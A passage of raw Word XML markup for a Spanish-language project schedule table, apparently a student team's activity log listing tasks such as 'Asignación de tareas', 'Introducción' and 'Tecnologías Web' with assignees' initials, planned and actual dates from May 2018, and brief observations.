              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="00977D14" w:rsidP="00977D14">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="DejaVu Sans"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00000A"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1489" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="00977D14" w:rsidP="00977D14">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r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Inicio Propuesto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="00977D14" w:rsidP="00977D14">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r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Fin Propuesto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="00977D14" w:rsidP="00977D14">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r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Inicio Real</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="00977D14" w:rsidP="00977D14">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r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Fin Real</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="00977D14" w:rsidP="00977D14">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="DejaVu Sans"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00000A"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F87DA9" w:rsidRPr="00977D14" w:rsidTr="003A7AEC">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F87DA9" w:rsidRPr="00977D14" w:rsidRDefault="0025575A" w:rsidP="00F87DA9">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F87DA9" w:rsidRPr="00977D14" w:rsidRDefault="00F87DA9" w:rsidP="00F87DA9">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p>
          <w:p w:rsidR="00F87DA9" w:rsidRPr="00977D14" w:rsidRDefault="00F87DA9" w:rsidP="00F87DA9">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r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Asignación de tareas</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F87DA9" w:rsidRPr="00977D14" w:rsidRDefault="00F87DA9" w:rsidP="00F87DA9">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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F87DA9" w:rsidRDefault="00F87DA9" w:rsidP="00F87DA9">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r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>MRG</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F87DA9" w:rsidRDefault="00F87DA9" w:rsidP="00F87DA9">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JAAB</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F87DA9" w:rsidRPr="00977D14" w:rsidRDefault="00F87DA9" w:rsidP="00F87DA9">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EAMM  AMG</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F87DA9" w:rsidRPr="00977D14" w:rsidRDefault="00F87DA9" w:rsidP="00F87DA9">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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1489" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F87DA9" w:rsidRPr="00977D14" w:rsidRDefault="004B09FB" w:rsidP="00F87DA9">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12</w:t>
            </w:r>
            <w:r w:rsidR="00F87DA9">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/05</w:t>
            </w:r>
            <w:r w:rsidR="00F87DA9" w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F87DA9" w:rsidRPr="00977D14" w:rsidRDefault="004B09FB" w:rsidP="00F87DA9">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12</w:t>
            </w:r>
            <w:r w:rsidR="00F87DA9">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/05</w:t>
            </w:r>
            <w:r w:rsidR="00F87DA9" w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F87DA9" w:rsidRPr="00977D14" w:rsidRDefault="004B09FB" w:rsidP="00F87DA9">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12</w:t>
            </w:r>
            <w:r w:rsidR="00F87DA9">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/05</w:t>
            </w:r>
            <w:r w:rsidR="00F87DA9" w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F87DA9" w:rsidRPr="00977D14" w:rsidRDefault="004B09FB" w:rsidP="00F87DA9">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12</w:t>
            </w:r>
            <w:r w:rsidR="00F87DA9">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/05</w:t>
            </w:r>
            <w:r w:rsidR="00F87DA9" w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00F87DA9" w:rsidRPr="00977D14" w:rsidRDefault="00F87DA9" w:rsidP="00F87DA9">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
              </w:tab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Se ocupó el tiempo asignado durante las materias que implicaron el desarrollo de la actividad para que cada uno de los integrantes participarán en </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>esa sub-actividad y quedar conformes con las tareas asignadas.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F87DA9" w:rsidRPr="00977D14" w:rsidRDefault="00F87DA9" w:rsidP="00F87DA9">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
              </w:tabs>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F87DA9" w:rsidRPr="00977D14" w:rsidRDefault="00F87DA9" w:rsidP="00F87DA9">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
              </w:tabs>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F87DA9" w:rsidRPr="00977D14" w:rsidRDefault="00F87DA9" w:rsidP="00F87DA9">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
              </w:tabs>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F87DA9" w:rsidRPr="00977D14" w:rsidRDefault="00F87DA9" w:rsidP="00F87DA9">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
              </w:tabs>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E63CB9" w:rsidRPr="00977D14" w:rsidTr="003A7A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Borders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E63CB9" w:rsidRPr="00977D14" w:rsidRDefault="0025575A" w:rsidP="00E63CB9">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E63CB9" w:rsidRPr="00977D14" w:rsidRDefault="00E63CB9" w:rsidP="00E63CB9">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p>
          <w:p w:rsidR="00E63CB9" w:rsidRPr="00977D14" w:rsidRDefault="00E63CB9" w:rsidP="00E63CB9">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r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Introducción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E63CB9" w:rsidRPr="00977D14" w:rsidRDefault="00E63CB9" w:rsidP="00E63CB9">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r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>ODLB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1489" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E63CB9" w:rsidRPr="00977D14" w:rsidRDefault="004B09FB" w:rsidP="00E63CB9">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15</w:t>
            </w:r>
            <w:r w:rsidR="00E63CB9">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/05</w:t>
            </w:r>
            <w:r w:rsidR="00E63CB9" w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E63CB9" w:rsidRPr="00977D14" w:rsidRDefault="004B09FB" w:rsidP="00E63CB9">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15</w:t>
            </w:r>
            <w:r w:rsidR="00E63CB9">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/05</w:t>
            </w:r>
            <w:r w:rsidR="00E63CB9" w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E63CB9" w:rsidRPr="00977D14" w:rsidRDefault="004B09FB" w:rsidP="00E63CB9">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15</w:t>
            </w:r>
            <w:r w:rsidR="00E63CB9">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/05</w:t>
            </w:r>
            <w:r w:rsidR="00E63CB9" w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E63CB9" w:rsidRPr="00977D14" w:rsidRDefault="004B09FB" w:rsidP="00E63CB9">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15/</w:t>
            </w:r>
            <w:r w:rsidR="00E63CB9">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>05</w:t>
            </w:r>
            <w:r w:rsidR="00E63CB9" w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E63CB9" w:rsidRPr="00977D14" w:rsidRDefault="00E63CB9" w:rsidP="00E63CB9">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
              </w:tabs>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Mejorar la redacción para dar al lector algo que le ocasione mayor interés para seguir leyendo el documento.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B09FB" w:rsidRPr="00977D14" w:rsidTr="003A7AEC">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="004B09FB" w:rsidRPr="00977D14" w:rsidRDefault="0025575A" w:rsidP="004B09FB">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="004B09FB" w:rsidRPr="00977D14" w:rsidRDefault="004B09FB" w:rsidP="004B09FB">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p>
          <w:p w:rsidR="004B09FB" w:rsidRPr="00977D14" w:rsidRDefault="004B09FB" w:rsidP="004B09FB">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Tecnologías Web</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004B09FB" w:rsidRPr="00977D14" w:rsidRDefault="004B09FB" w:rsidP="004B09FB">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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="004B09FB" w:rsidRPr="00977D14" w:rsidRDefault="004B09FB" w:rsidP="004B09FB">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p>
          <w:p w:rsidR="004B09FB" w:rsidRDefault="004B09FB" w:rsidP="004B09FB">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r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>MRG</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004B09FB" w:rsidRPr="00977D14" w:rsidRDefault="004B09FB" w:rsidP="004B09FB">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JAAB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1489" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="004B09FB" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="004B09FB">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12</w:t>
            </w:r>
            <w:r w:rsidR="004B09FB">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/05</w:t>
            </w:r>
            <w:r w:rsidR="004B09FB" w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="004B09FB" w:rsidRPr="00977D14" w:rsidRDefault="004B09FB" w:rsidP="004B09FB">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15/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="004B09FB" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="004B09FB">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13</w:t>
            </w:r>
            <w:r w:rsidR="004B09FB">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/05</w:t>
            </w:r>
